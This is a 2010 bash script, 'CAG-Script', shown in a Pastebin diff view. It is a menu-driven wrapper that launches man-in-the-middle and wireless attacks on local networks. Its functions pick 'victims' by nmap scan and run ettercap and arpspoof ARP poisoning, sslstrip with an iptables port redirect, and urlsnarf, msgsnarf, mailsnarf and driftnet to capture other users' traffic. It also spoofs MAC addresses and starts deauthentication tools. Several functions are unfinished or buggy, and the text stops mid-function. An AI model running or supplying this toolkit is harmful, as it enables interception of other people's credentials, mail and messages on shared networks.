View difference between Paste ID: EAWqCebR and
SHOW:
|
|
- or go back to the newest paste.
1 | - | |
1 | + | #!/bin/bash |
2 | #CAG-Script v0.4 | |
3 | #Script by CAG (aka BobaFett) | |
4 | #May 2010 (updated June 2010) | |
5 | #To run script, modify the "Customizable Variables" section to meet your needs, make it executable using chmod, or simply right click->properties->permissions->check "is executable", then change to the appropriate directory and type ./CAG-Script in terminal. | |
6 | #I recommend you run this script on BT4. You will need to install some other programs (like airdrop-ng) if you wish to use them | |
7 | #On a BT4 live cd I suggest you run my Airdrop-ng install script which will be posted on Pastebin shortly and then integrated into this script | |
8 | ||
9 | ############### Customizable Variables ################ | |
10 | #You must change these to meet your system needs | |
11 | export MACSPOOF="00:11:22:33:44:55" #Mac that macchanger defaults too. Can be any mac address | |
12 | ||
13 | export WIFIMAN="wlan0" #your card interface (i.e. wlan0, eth0, etc) | |
14 | export WIFIMON="mon0" #virtual "monitor mode" interface created using Airmon-ng | |
15 | ||
16 | export TERMINAL="xterm" #Your terminal emulator of choice (i.e. xterm, terminator, etc) | |
17 | ||
18 | export SSLSTRIPPORT="8080" #This can be any (small) number you choose | |
19 | export SSLOPTIONS="-k -f -l $SSLSTRIPPORT" #Sslstrip options, run "driftnet -h" for help | |
20 | export SSLSTRIPLOC=".../.sslstrip-0.7" #Location off sslstrip.py | |
21 | ||
22 | export DRIFTNETOUT=".../Pics" #Where Driftnet stores captured images | |
23 | export DRIFTNETOPTIONS="-a -d" #Driftnet options, run "driftnet -h" for help | |
24 | ||
25 | export DROPRULES="/root/rules" #Airdrop-ng drop rules. You can edit this file "realtime" during the program | |
26 | ||
27 | export TEXTEDITOR="kate" #Any gui text editor (i.e. kate, geany, etc) | |
28 | ||
29 | export DEFAULTAIRODUMPOUT="/root/test" #Airodump output file location | |
30 | export VICTIMIP="192.168.1.2" #default victim, you can change this temporarilly during the script | |
31 | ############### Customizable Variables ################ | |
32 | ||
33 | ################## Static Variables ################### | |
34 | #Don't change any of these variables unless you know what you're doing | |
35 | export ROOT_UID=0 | |
36 | export E_NOTROOT=87 | |
37 | export SSLSTRIPRUN=0 | |
38 | export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2) | |
39 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
40 | export SELFIP=$(echo $ip_addr_str|cut -d ' ' -f 9) | |
41 | export SELFMAC=$(ifconfig ${self_ip_dev}|grep 'HWaddr'|cut -c 39-55) | |
42 | export fileout=false | |
43 | export fileout_path='./macs' | |
44 | export ipblocks=51 | |
45 | export tmpfile=$(tempfile) | |
46 | export self_ip_dev=$(echo $ip_addr_str|cut -d ' ' -f 3) | |
47 | ################## Static Variables ################### | |
48 | ||
49 | ###################### Functions ###################### | |
50 | Configmenufunc() | |
51 | { | |
52 | echo "1-6 are temporary. 7 is permanent." | |
53 | echo | |
54 | echo "1) Set Wireless/Wired interface (current: $WIFIMAN)" | |
55 | echo "2) Set gui text editor (current: $TEXTEDITOR)" | |
56 | echo "3) Set sslstrip options (current: $SSLOPTIONS)" | |
57 | echo "4) Set Driftnet output location (current: $DRIFTNETOUT" | |
58 | echo "5) Set Driftnet options (current: $DRIFTNETOPTIONS" | |
59 | echo "6) Set terminal emulator (current: $TERMINAL)" | |
60 | echo "7) Modify CAG-Script source" | |
61 | echo "8) Exit" | |
62 | echo "9) < Return to main menu" | |
63 | while [ 1 ] | |
64 | do | |
65 | read Configmenufunccase | |
66 | case "$Configmenufunccase" in | |
67 | "1") | |
68 | clear | |
69 | echo "Type Wireless/Wired interface (i.e Wlan0):" | |
70 | read WIFIMAN | |
71 | export $WIFIMAN | |
72 | Configmenufunc | |
73 | ;; | |
74 | "2") | |
75 | clear | |
76 | echo "Type gui text editor (i.e kate):" | |
77 | read TEXTEDITOR | |
78 | export $TEXTEDITOR | |
79 | Configmenufunc | |
80 | ;; | |
81 | "3") | |
82 | clear | |
83 | echo "Type sslstrip options (i.e. -k -f -l 8080):" | |
84 | read SSLOPTIONS | |
85 | export $SSLOPTIONS | |
86 | Configmenufunc | |
87 | ;; | |
88 | "4") | |
89 | clear | |
90 | echo "Type Driftnet output location (i.e. /root/Pics):" | |
91 | read DRIFTNETOUT | |
92 | export $DRIFTNETOUT | |
93 | Configmenufunc | |
94 | ;; | |
95 | "5") | |
96 | clear | |
97 | echo "Type terminal emulator (i.e. xterm):" | |
98 | read TERMINAL | |
99 | export $TERMINAL | |
100 | Configmenufunc | |
101 | ;; | |
102 | "6") | |
103 | clear | |
104 | echo "Type terminal emulator (i.e. xterm):" | |
105 | read TERMINAL | |
106 | export $TERMINAL | |
107 | Configmenufunc | |
108 | ;; | |
109 | "7") | |
110 | clear | |
111 | echo "*WARNING* Do not modify any section of this file other than 'Customizable Variables' section unless you know what you're doing. All changes are permanent." | |
112 | $TEXTEDITOR CAG-Script | |
113 | clear | |
114 | Configmenufunc | |
115 | ;; | |
116 | "8") | |
117 | #exitfunc this needs to be written | |
118 | exit | |
119 | ;; | |
120 | "9") | |
121 | clear | |
122 | Mainmenufunc | |
123 | ;; | |
124 | esac | |
125 | done | |
126 | } | |
127 | export -f Configmenufunc | |
128 | ||
129 | ||
130 | scriptstartfunc() | |
131 | { | |
132 | echo "Initializing CAG-Script." | |
133 | sleep .3 | |
134 | clear | |
135 | echo "Initializing CAG-Script.." | |
136 | sleep .3 | |
137 | clear | |
138 | echo "Initializing CAG-Script..." | |
139 | sleep .5 | |
140 | clear | |
141 | } | |
142 | ||
143 | nmapscanfunc() | |
144 | { | |
145 | export GATEWAYLENGTH=$(expr length "$GATEWAYIP") | |
146 | ||
147 | if [ $GATEWAYLENGTH -eq "11" ] | |
148 | then | |
149 | export NMAPVICTIMFRONT=$(ip route show | grep default | awk '{ print $3}' | cut -c 1-10) | |
150 | export NMAPVICTIMEND="*" | |
151 | NMAPVICTIMS="${NMAPVICTIMFRONT}${NMAPVICTIMEND}" | |
152 | else | |
153 | echo "non-standard ip length, type nmap victims manually, replacing last digit(s) with '*' (i.e. 192.168.1.*)" | |
154 | read NMAPVICTIMS | |
155 | fi | |
156 | ||
157 | clear | |
158 | ||
159 | nmap -n -sP -oG ${tmpfile} $NMAPVICTIMS #>/dev/null | |
160 | ip_list=$(grep 'Status: Up' ${tmpfile}|cut -d ' ' -f 2 ) | |
161 | ||
162 | set $ip_list | |
163 | victim1=$1 | |
164 | victim2=$2 | |
165 | victim3=$3 | |
166 | victim4=$4 | |
167 | victim5=$5 | |
168 | victim6=$6 | |
169 | victim7=$7 | |
170 | victim8=$8 | |
171 | victim9=$9 | |
172 | } | |
173 | export -f nmapscanfunc | |
174 | ||
175 | choosevictimafternmapfunc() | |
176 | { | |
177 | if [ $victim1 -ne ] 2>/dev/null | |
178 | then | |
179 | echo -n | |
180 | else | |
181 | echo "1) $victim1" | |
182 | fi | |
183 | ||
184 | if [ $victim2 -ne ] 2>/dev/null | |
185 | then | |
186 | echo -n | |
187 | else | |
188 | echo "2) $victim2" | |
189 | fi | |
190 | ||
191 | if [ $victim3 -ne ] 2>/dev/null | |
192 | then | |
193 | echo -n | |
194 | else | |
195 | echo "3) $victim3" | |
196 | fi | |
197 | ||
198 | if [ $victim4 -ne ] 2>/dev/null | |
199 | then | |
200 | echo -n | |
201 | else | |
202 | echo "4) $victim4" | |
203 | fi | |
204 | ||
205 | if [ $victim5 -ne ] 2>/dev/null | |
206 | then | |
207 | echo -n | |
208 | else | |
209 | echo "5) $victim5" | |
210 | fi | |
211 | ||
212 | if [ $victim6 -ne ] 2>/dev/null | |
213 | then | |
214 | echo -n | |
215 | else | |
216 | echo "6) $victim6" | |
217 | fi | |
218 | ||
219 | if [ $victim7 -ne ] 2>/dev/null | |
220 | then | |
221 | echo -n | |
222 | else | |
223 | echo "7) $victim7" | |
224 | fi | |
225 | ||
226 | if [ $victim8 -ne ] 2>/dev/null | |
227 | then | |
228 | echo -n | |
229 | else | |
230 | echo "8) $victim8" | |
231 | fi | |
232 | ||
233 | if [ $victim9 -ne ] 2>/dev/null | |
234 | then | |
235 | echo -n | |
236 | else | |
237 | echo "9) $victim9" | |
238 | fi | |
239 | ||
240 | echo "choose victim IP:" | |
241 | ||
242 | while [ 1 ] | |
243 | do | |
244 | read Nmapscancase | |
245 | case "$Nmapscancase" in | |
246 | "1") | |
247 | export VICTIMIP=$victim1 | |
248 | break | |
249 | ;; | |
250 | "2") | |
251 | export VICTIMIP=$victim2 | |
252 | break | |
253 | ;; | |
254 | "3") | |
255 | export VICTIMIP=$victim3 | |
256 | break | |
257 | ;; | |
258 | "4") | |
259 | export VICTIMIP=$victim4 | |
260 | break | |
261 | ;; | |
262 | "5") | |
263 | export VICTIMIP=$victim5 | |
264 | break | |
265 | ;; | |
266 | "6") | |
267 | export VICTIMIP=$victim6 | |
268 | break | |
269 | ;; | |
270 | "7") | |
271 | export VICTIMIP=$victim7 | |
272 | break | |
273 | ;; | |
274 | "8") | |
275 | export VICTIMIP=$victim8 | |
276 | break | |
277 | ;; | |
278 | "9") | |
279 | export VICTIMIP=$victim9 | |
280 | break | |
281 | ;; | |
282 | esac | |
283 | done | |
284 | } | |
285 | export -f choosevictimafternmapfunc | |
286 | ||
287 | arghelp() | |
288 | { | |
289 | Usage: $0 ./CAG-Script [args] | |
290 | echo" -h, --help - Print this help and exit" | |
291 | echo" -i. --iface - Interface to use" | |
292 | ||
293 | echo" -v, --victim - IP address of desired host" | |
294 | echo" -g, --gateway - IP address of network gateway" | |
295 | } | |
296 | export -f arghelp | |
297 | ||
298 | argfunc() | |
299 | { | |
300 | export -f arghelp | |
301 | ||
302 | while [ $# -gt 0 ] | |
303 | do | |
304 | case "$1" in | |
305 | "-h"|"--help") | |
306 | help | |
307 | exit | |
308 | ;; | |
309 | "-v"|"--victim") | |
310 | export VICTIMIP="$2" | |
311 | ;; | |
312 | "-g"|"--gw") | |
313 | export GATEWAYIP="$2" | |
314 | ;; | |
315 | "-i"|"--iface") | |
316 | if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then | |
317 | die "Error: interface "$2" does not exist!" | |
318 | else | |
319 | iface="-i $2" | |
320 | fi | |
321 | ;; | |
322 | esac | |
323 | shift | |
324 | done | |
325 | } | |
326 | export -f argfunc | |
327 | ||
328 | rootcheck() | |
329 | { | |
330 | if [ "$UID" -ne "$ROOT_UID" ] | |
331 | then | |
332 | echo "Must be root to run this script." | |
333 | exit $E_NOTROOT | |
334 | fi | |
335 | } | |
336 | export -f rootcheck | |
337 | ||
338 | ipforwardstartfunc() | |
339 | { | |
340 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
341 | } | |
342 | export -f ipforwardstartfunc | |
343 | ||
344 | ipforwardstopfunc() | |
345 | { | |
346 | while [ $(cat /proc/sys/net/ipv4/ip_forward) == 1 ] | |
347 | do | |
348 | echo 0 > /proc/sys/net/ipv4/ip_forward | |
349 | done | |
350 | } | |
351 | export -f ipforwardstopfunc | |
352 | ||
353 | checkconnectionfunc() | |
354 | { | |
355 | export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')" | |
356 | if [ $GATEWAYIP -ne ] | |
357 | then | |
358 | echo "No internet available :(" | |
359 | export connectionvar=0 | |
360 | else | |
361 | export GATEWAYIP="$(ip route show | grep default | awk '{ print $3}')" | |
362 | export VICTIMIP="/${IP1}${IP2}/" | |
363 | echo "We've got internet" | |
364 | export connectionvar=1 | |
365 | exit | |
366 | fi | |
367 | } | |
368 | ||
369 | essidfunc() | |
370 | { | |
371 | export ESSIDVAR=$(iwconfig $WIFIMAN | grep ESSID | cut -d '"' -f 2) | |
372 | echo "connected to $ESSIDVAR" | |
373 | } | |
374 | ||
375 | exitfunc() | |
376 | { | |
377 | echo 0 > /proc/sys/net/ipv4/ip_forward | |
378 | killall sslstrip 2>/dev/null | |
379 | pkill sslstrip 2>/dev/null | |
380 | iptables --flush | |
381 | iptables --table nat --flush | |
382 | iptables --delete-chain | |
383 | iptables --table nat --delete-chain | |
384 | } | |
385 | export -f exitfunc | |
386 | ||
387 | sslstripexitfunc() | |
388 | { | |
389 | iptables --flush | |
390 | iptables --table nat --flush | |
391 | iptables --delete-chain | |
392 | iptables --table nat --delete-chain | |
393 | } | |
394 | export -f sslstripexitfunc | |
395 | ||
396 | chooseettercapvictim() | |
397 | { | |
398 | echo "Complete victim IP:" | |
399 | echo "leave blank and press enter to spoof entire network" | |
400 | echo -n "192.168." && read IP2 | |
401 | IP1=192.168. | |
402 | if [ $IP2 -eq ] | |
403 | then | |
404 | export VICTIMIP="//" | |
405 | export GATEWAYIP="//" | |
406 | echo "spoofing entire network..." | |
407 | echo "press q to re-arp victims" | |
408 | else | |
409 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
410 | export VICTIMIP="/${IP1}${IP2}/" | |
411 | fi | |
412 | } | |
413 | export -f chooseettercapvictim | |
414 | ||
415 | choosearpspoofvictim() | |
416 | { | |
417 | echo "Complete victim IP:" | |
418 | echo "leave blank and press enter to spoof entire network" | |
419 | echo -n "192.168." && read IP2 | |
420 | IP1=192.168. | |
421 | if [ $IP2 -eq ] | |
422 | then | |
423 | export VICTIMIP=" " | |
424 | export TARGETOPTION=" " | |
425 | echo "spoofing entire network..." | |
426 | else | |
427 | export VICTIMIP=${IP1}${IP2} | |
428 | export TARGETOPTION="-t" | |
429 | echo $VICTIMIP | |
430 | fi | |
431 | } | |
432 | export -f choosearpspoofvictim | |
433 | ||
434 | ettercapfunc() | |
435 | { | |
436 | echo "1) Run Arp-Poisoning attack against $VICTIMIP" | |
437 | echo "2) Spoof entire network (this will drastically slow down large networks)" | |
438 | echo "3) Manually type victim IP" | |
439 | echo "4) Scan for victims using Nmap" | |
440 | echo "5) < Return to MITM menu" | |
441 | echo "6) exit" | |
442 | while [ 1 ] | |
443 | do | |
444 | read restartettercapmenu | |
445 | case "$restartettercapmenu" in | |
446 | "1") | |
447 | echo " " | |
448 | echo "...starting Ettercap-Ng, press q to stop attack..." | |
449 | echo " " | |
450 | ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/ | |
451 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
452 | ettercapfunc | |
453 | ;; | |
454 | ||
455 | "2") | |
456 | echo " " | |
457 | echo "...starting Ettercap-Ng, press q to stop attack..." | |
458 | echo " " | |
459 | ettercap -T -i $WIFIMAN -Tq -M ARP // // | |
460 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
461 | ettercapfunc | |
462 | ;; | |
463 | "3") | |
464 | echo " " | |
465 | echo "...starting Ettercap-Ng, press q to stop attack..." | |
466 | echo " " | |
467 | chooseettercapvictim | |
468 | ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ $VICTIMIP | |
469 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
470 | ettercapfunc | |
471 | ;; | |
472 | "4") | |
473 | nmapscanfunc | |
474 | choosevictimafternmapfunc | |
475 | echo " " | |
476 | echo "...starting Ettercap-Ng, press q to stop attack..." | |
477 | echo " " | |
478 | export GATEWAYIP=$(ip route show | grep default | awk '{ print $3}') | |
479 | ettercap -T -i $WIFIMAN -Tq -M ARP /$GATEWAYIP/ /$VICTIMIP/ | |
480 | ettercapfunc | |
481 | ;; | |
482 | "5") | |
483 | clear | |
484 | MITMattackmenufunc | |
485 | ;; | |
486 | "6") | |
487 | exit | |
488 | ;; | |
489 | esac | |
490 | done | |
491 | } | |
492 | export -f ettercapfunc | |
493 | ||
494 | arpspooffunc() | |
495 | { | |
496 | echo "1) Run Arp-Poisoning attack against $VICTIMIP" | |
497 | echo "2) Spoof entire network (this will drastically slow down large networks)" | |
498 | echo "3) Manually type victim IP" | |
499 | echo "4) Scan for victims using Nmap" | |
500 | echo "5) < Return to MITM menu" | |
501 | echo "6) exit" | |
502 | while [ 1 ] | |
503 | do | |
504 | read restartarpspoofmenu | |
505 | case "$restartarpspoofmenu" in | |
506 | "1") | |
507 | echo " " | |
508 | echo "...starting Arpspoof, press ctrl-c to stop attack..." | |
509 | echo " " | |
510 | ipforwardstartfunc | |
511 | arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP | |
512 | arpspooffunc | |
513 | ;; | |
514 | ||
515 | "2") | |
516 | echo " " | |
517 | echo "...starting Arpspoof, press ctrl-c to stop attack..." | |
518 | echo " " | |
519 | ipforwardstartfunc | |
520 | arpspoof -i $WIFIMAN $GATEWAYIP | |
521 | arpspooffunc | |
522 | ;; | |
523 | ||
524 | "3") | |
525 | choosearpspoofvictim | |
526 | echo | |
527 | echo "...starting Arpspoof attack, press ctrl-c to stop attack..." | |
528 | echo | |
529 | ipforwardstartfunc | |
530 | arpspoof -i $WIFIMAN $TARGETOPTION $VICTIMIP $GATEWAYIP | |
531 | arpspooffunc | |
532 | ;; | |
533 | "4") | |
534 | nmapscanfunc | |
535 | choosevictimafternmapfunc | |
536 | echo | |
537 | echo "...starting Arpspoof attack, press ctrl-c to stop attack..." | |
538 | echo | |
539 | ipforwardstartfunc | |
540 | arpspoof -i $WIFIMAN -t $VICTIMIP $GATEWAYIP | |
541 | arpspooffunc | |
542 | MITMattackmenufunc | |
543 | ;; | |
544 | "5") | |
545 | MITMattackmenufunc | |
546 | ;; | |
547 | "6") | |
548 | exit | |
549 | ;; | |
550 | esac | |
551 | done | |
552 | } | |
553 | export -f arpspooffunc | |
554 | ||
555 | urlsnarffunc() | |
556 | { | |
557 | ipforwardstartfunc | |
558 | urlsnarf -i $WIFIMAN | |
559 | } | |
560 | export -f urlsnarffunc | |
561 | ||
562 | driftnetfunc() | |
563 | { | |
564 | ipforwardstartfunc | |
565 | driftnet -i $WIFIMAN $DRIFTNETOPTIONS $DRIFTNETOUT | |
566 | echo "Driftnet killed, delete captured images? (yes,no)" | |
567 | read driftnetdeleteopt | |
568 | if [ $driftnetdeleteopt -eq yes ] | |
569 | then | |
570 | rm -r $DRIFTNETOUT | |
571 | mkdir $DRIFTNETOUT | |
572 | else | |
573 | exit | |
574 | fi | |
575 | } | |
576 | export -f driftnetfunc | |
577 | ||
578 | webspyfunc() | |
579 | { | |
580 | echo "not complete" | |
581 | } | |
582 | export -f webspyfunc | |
583 | ||
584 | msgsnarffunc() | |
585 | { | |
586 | ipforwardstartfunc | |
587 | msgsnarf -i wlan0 | |
588 | } | |
589 | export -f msgsnarffunc | |
590 | ||
591 | mailsnarffunc() | |
592 | { | |
593 | ipforwardstartfunc | |
594 | mailsnarf -i wlan0 | |
595 | } | |
596 | export -f mailsnarffunc | |
597 | ||
598 | sslstripfunc() | |
599 | { | |
600 | #if [ "$SSLSTRIPRUN" -eq "0" ] | |
601 | #then | |
602 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SSLSTRIPPORT | |
603 | # SSLSTRIPRUN=1 | |
604 | #fi | |
605 | #ipforwardstartfunc | |
606 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
607 | cd $SSLSTRIPLOC | |
608 | #$TERMINAL --execute bash -c "cd $SSLSTRIPLOC && cat sslstrip.log ; bash" & | |
609 | python sslstrip.py $SSLOPTIONS 2> /dev/null | |
610 | } | |
611 | export -f sslstripfunc | |
612 | ||
613 | tcpkillfunc() | |
614 | { | |
615 | echo "not complete" | |
616 | } | |
617 | export -f tcpkillfunc | |
618 | ||
619 | MITMhelpfunc() | |
620 | { | |
621 | clear | |
622 | echo "CHoose program manual to read:" | |
623 | echo "1) Ettercap-ng" | |
624 | echo "2) Arpspoof" | |
625 | echo "3) Urlsnarf" | |
626 | echo "4) Driftnet" | |
627 | echo "5) Webspy" | |
628 | echo "6) Msgsnarf" | |
629 | echo "7) Mailsnarf" | |
630 | echo "8) Sslstrip" | |
631 | echo "9) Tcpkill" | |
632 | echo "10) < Return to MITM menu" | |
633 | while [ 1 ] | |
634 | do | |
635 | read MITMhelpcase | |
636 | case "$MITMhelpcase" in | |
637 | "1") | |
638 | ettercap -h | |
639 | echo "Press enter to return to help menu:" | |
640 | read MITMHELPVAR | |
641 | clear | |
642 | MITMattackmenufunc | |
643 | ;; | |
644 | ||
645 | "2") | |
646 | arpspoof -h | |
647 | echo "Press enter to return to help menu:" | |
648 | read MITMHELPVAR | |
649 | clear | |
650 | MITMattackmenufunc | |
651 | ;; | |
652 | "3") | |
653 | urlsnarf -h | |
654 | echo "Press enter to return to help menu:" | |
655 | read MITMHELPVAR | |
656 | clear | |
657 | MITMattackmenufunc | |
658 | ;; | |
659 | "4") | |
660 | driftnet -h | |
661 | echo "Press enter to return to help menu:" | |
662 | read MITMHELPVAR | |
663 | clear | |
664 | MITMattackmenufunc | |
665 | ;; | |
666 | "5") | |
667 | webspy -h | |
668 | echo "Press enter to return to help menu:" | |
669 | read MITMHELPVAR | |
670 | clear | |
671 | MITMattackmenufunc | |
672 | ;; | |
673 | ||
674 | "6") | |
675 | msgsnarf -h | |
676 | echo "Press enter to return to help menu:" | |
677 | read MITMHELPVAR | |
678 | clear | |
679 | MITMattackmenufunc | |
680 | ;; | |
681 | "7") | |
682 | mailsnarf -h | |
683 | echo "Press enter to return to help menu:" | |
684 | read MITMHELPVAR | |
685 | clear | |
686 | MITMattackmenufunc | |
687 | ;; | |
688 | "8") | |
689 | cd $SSLSTRIPLOC | |
690 | python sslstrip.py -h | |
691 | echo "Press enter to return to help menu:" | |
692 | read MITMHELPVAR | |
693 | clear | |
694 | MITMattackmenufunc | |
695 | ;; | |
696 | "9") | |
697 | tcpkill -h | |
698 | echo "Press enter to return to help menu:" | |
699 | read MITMHELPVAR | |
700 | clear | |
701 | MITMattackmenufunc | |
702 | ;; | |
703 | "10") | |
704 | clear | |
705 | MITMattackmenufunc | |
706 | ;; | |
707 | esac | |
708 | done | |
709 | } | |
710 | export -f MITMhelpfunc | |
711 | ||
712 | MITMattackmenufunc() | |
713 | { | |
714 | clear | |
715 | echo "Choose program:" | |
716 | echo "1) Ettercap" | |
717 | echo "2) Arpspoof" | |
718 | echo "3) Urlsnarf" | |
719 | echo "4) Driftnet" | |
720 | echo "5) Webspy (not working yet...)" | |
721 | echo "6) Msgsnarf" | |
722 | echo "7) Mailsnarf" | |
723 | echo "8) Sslstrip" | |
724 | echo "9) Tcpkill" | |
725 | echo "10) Help" | |
726 | echo "11) < Return to main menu" | |
727 | ||
728 | while [ 1 ] | |
729 | do | |
730 | ||
731 | read MITMattackmenucase | |
732 | case "$MITMattackmenucase" in | |
733 | "1") | |
734 | $TERMINAL --execute bash -c "ettercapfunc ; bash" & | |
735 | clear | |
736 | MITMattackmenufunc | |
737 | ;; | |
738 | "2") | |
739 | $TERMINAL --execute bash -c "arpspooffunc ; bash" & | |
740 | clear | |
741 | MITMattackmenufunc | |
742 | ;; | |
743 | "3") | |
744 | $TERMINAL --execute bash -c "urlsnarffunc ; bash" & | |
745 | clear | |
746 | MITMattackmenufunc | |
747 | ;; | |
748 | "4") | |
749 | $TERMINAL --execute bash -c "driftnetfunc ; bash" & | |
750 | clear | |
751 | MITMattackmenufunc | |
752 | ;; | |
753 | "5") | |
754 | $TERMINAL --execute bash -c "webspyfunc ; bash" & | |
755 | clear | |
756 | MITMattackmenufunc | |
757 | ;; | |
758 | "6") | |
759 | $TERMINAL --execute bash -c "msgsnarffunc ; bash" & | |
760 | clear | |
761 | MITMattackmenufunc | |
762 | ;; | |
763 | "7") | |
764 | $TERMINAL --execute bash -c "mailsnarffunc ; bash" & | |
765 | clear | |
766 | MITMattackmenufunc | |
767 | ;; | |
768 | "8") | |
769 | $TERMINAL --execute bash -c "sslstripfunc ; bash" & | |
770 | MITMattackmenufunc | |
771 | ;; | |
772 | "9") | |
773 | clear | |
774 | MITMattackmenufunc | |
775 | ;; | |
776 | "10") | |
777 | $TERMINAL --execute bash -c "tcpkillfunc ; bash" & | |
778 | clear | |
779 | MITMhelpfunc | |
780 | ;; | |
781 | "11") | |
782 | clear | |
783 | Mainmenufunc | |
784 | ;; | |
785 | esac | |
786 | done | |
787 | } | |
788 | export -f MITMattackmenufunc | |
789 | ||
790 | Mainmenufunc() | |
791 | { | |
792 | echo "Choose type of attack:" | |
793 | echo "1) MITM attack" | |
794 | echo "2) Passive sniffing and probing" | |
795 | echo "3) Deauth/Dos attack" | |
796 | echo "4) Config" | |
797 | echo "5) Help" | |
798 | echo "6) Exit" | |
799 | while [ 1 ] | |
800 | do | |
801 | read Mainmenucase | |
802 | case "$Mainmenucase" in | |
803 | "1") | |
804 | clear | |
805 | MITMattackmenufunc | |
806 | Mainmenufunc | |
807 | ;; | |
808 | "2") | |
809 | clear | |
810 | Passivesniffingmenufunc | |
811 | Mainmenufunc | |
812 | ;; | |
813 | "3") | |
814 | clear | |
815 | Deauthmenu | |
816 | Mainmenufunc | |
817 | ;; | |
818 | "4") | |
819 | clear | |
820 | Configmenufunc | |
821 | ;; | |
822 | "5") | |
823 | clear | |
824 | echo "No help yet, sorry..." | |
825 | Mainmenufunc | |
826 | ;; | |
827 | "6") | |
828 | exit | |
829 | ;; | |
830 | esac | |
831 | done | |
832 | } | |
833 | ||
834 | Passivesniffingmenufunc() | |
835 | { | |
836 | echo "Choose program to run:" | |
837 | echo "1) Wireshark" | |
838 | echo "2) Zenmap" | |
839 | echo "3) EtherApe" | |
840 | echo "4) Angry IP Scanner" | |
841 | echo "5) ifconfig" | |
842 | echo "6) iwconfig" | |
843 | echo "7) Help" | |
844 | echo "8) Exit" | |
845 | echo "9) < Return to main menu" | |
846 | ||
847 | while [ 1 ] | |
848 | do | |
849 | read Passivesniffingmenucase | |
850 | case "$Passivesniffingmenucase" in | |
851 | "1") | |
852 | wireshark 2> /dev/null & | |
853 | clear | |
854 | Passivesniffingmenufunc | |
855 | ;; | |
856 | "2") | |
857 | zenmap 2> /dev/null & | |
858 | clear | |
859 | Passivesniffingmenufunc | |
860 | ;; | |
861 | "3") | |
862 | etherape -i $WIFIMAN 2> /dev/null & | |
863 | clear | |
864 | Passivesniffingmenufunc | |
865 | ;; | |
866 | "4") | |
867 | /usr/bin/ipscan 2> /dev/null & | |
868 | clear | |
869 | Passivesniffingmenufunc | |
870 | ;; | |
871 | "5") | |
872 | ifconfig | |
873 | Passivesniffingmenufunc | |
874 | ;; | |
875 | "6") | |
876 | iwconfig | |
877 | Passivesniffingmenufunc | |
878 | ;; | |
879 | "7") | |
880 | clear | |
881 | echo "No help, sorry..." | |
882 | Passivesniffingmenufunc | |
883 | ;; | |
884 | "8") | |
885 | #exitfunc this needs to be written | |
886 | exit | |
887 | ;; | |
888 | "9") | |
889 | Mainmenufunc | |
890 | ;; | |
891 | esac | |
892 | done | |
893 | } | |
894 | export Passivesniffingmenufunc | |
895 | ||
896 | Macchangerfunc() | |
897 | { | |
898 | echo "1) Spoof Mac address to $MACSPOOF" | |
899 | echo "2) Manually type Mac address" | |
900 | echo "3) Random Mac address" | |
901 | echo "4) Run custom command" | |
902 | echo "5) Help" | |
903 | echo "6) < Return to main menu" | |
904 | while [ 1 ] | |
905 | do | |
906 | read CHOICE1 | |
907 | case "$CHOICE1" in | |
908 | "1") | |
909 | ifconfig $WIFIMAN down | |
910 | macchanger $WIFIMAN -m $MACSPOOF | |
911 | ifconfig $WIFIMAN up | |
912 | echo | |
913 | Mainmenufunc | |
914 | ;; | |
915 | "2") | |
916 | echo "Type new fake mac address: (i.e. 00:11:22:33:44:55)" | |
917 | read MACINTCUSTOM | |
918 | ifconfig $WIFIMAN down | |
919 | macchanger $WIFIMAN -m $MACINTCUSTOM | |
920 | ifconfig $WIFIMAN up | |
921 | echo | |
922 | Mainmenufunc | |
923 | ;; | |
924 | "3") | |
925 | macchanger $WIFIMAN -r | |
926 | echo | |
927 | Mainmenufunc | |
928 | ;; | |
929 | "4") | |
930 | echo "Type custom macchanger command:" | |
931 | ifconfig $WIFIMAN down | |
932 | echo -n "macchanger $WIFIMAN" && read $CUSTOMMACCHANGEROPTONS | |
933 | macchanger $WIFIMAN $CUSTOMMACCHANGEROPTONS | |
934 | ifconfig $WIFIMAN up | |
935 | clear | |
936 | Mainmenufunc | |
937 | ;; | |
938 | "5") | |
939 | clear | |
940 | Mainmenufunc | |
941 | ;; | |
942 | "6") | |
943 | clear | |
944 | Mainmenufunc | |
945 | ;; | |
946 | esac | |
947 | done | |
948 | } | |
949 | export -f Macchangerfunc | |
950 | ||
951 | Deauthmenu() | |
952 | { | |
953 | echo "Choose program to run:" | |
954 | echo "1) Airdrop-ng" | |
955 | echo "2) Tuxcut" | |
956 | #echo "3) " | |
957 | #echo "4) " | |
958 | #echo "5) " | |
959 | #echo "6) " | |
960 | #echo "7) " | |
961 | echo "3) Help" | |
962 | echo "4) Exit" | |
963 | echo "5) < Return to main menu" | |
964 | ||
965 | while [ 1 ] | |
966 | do | |
967 | read Deauthmenucase | |
968 | case "$Deauthmenucase" in | |
969 | "1") | |
970 | $TERMINAL --execute bash -c "Airdropngfunc ; bash" & | |
971 | clear | |
972 | Passivesniffingmenufunc | |
973 | ;; | |
974 | "2") | |
975 | tuxcut & | |
976 | clear | |
977 | Passivesniffingmenufunc | |
978 | ;; | |
979 | "3") | |
980 | echo "No help yet, sorry..." | |
981 | Passivesniffingmenufunc | |
982 | ;; | |
983 | "4") | |
984 | #exitfunc this needs to be written | |
985 | exit | |
986 | ;; | |
987 | "5") | |
988 | Mainmenufunc | |
989 | ;; | |
990 | esac | |
991 | done | |
992 | } | |
993 | export -f Deauthmenu | |
994 | ||
995 | Airdropngfunc() | |
996 | { | |
997 | rm /root/*.csv 2> /dev/null #cleaning up csv from previous run 2> /dev/null | |
998 | ||
999 | echo "1) use default output location ($DEFAULTAIRODUMPOUT)" | |
1000 | echo "2) choose airodump output name" | |
1001 | echo "3) quit" | |
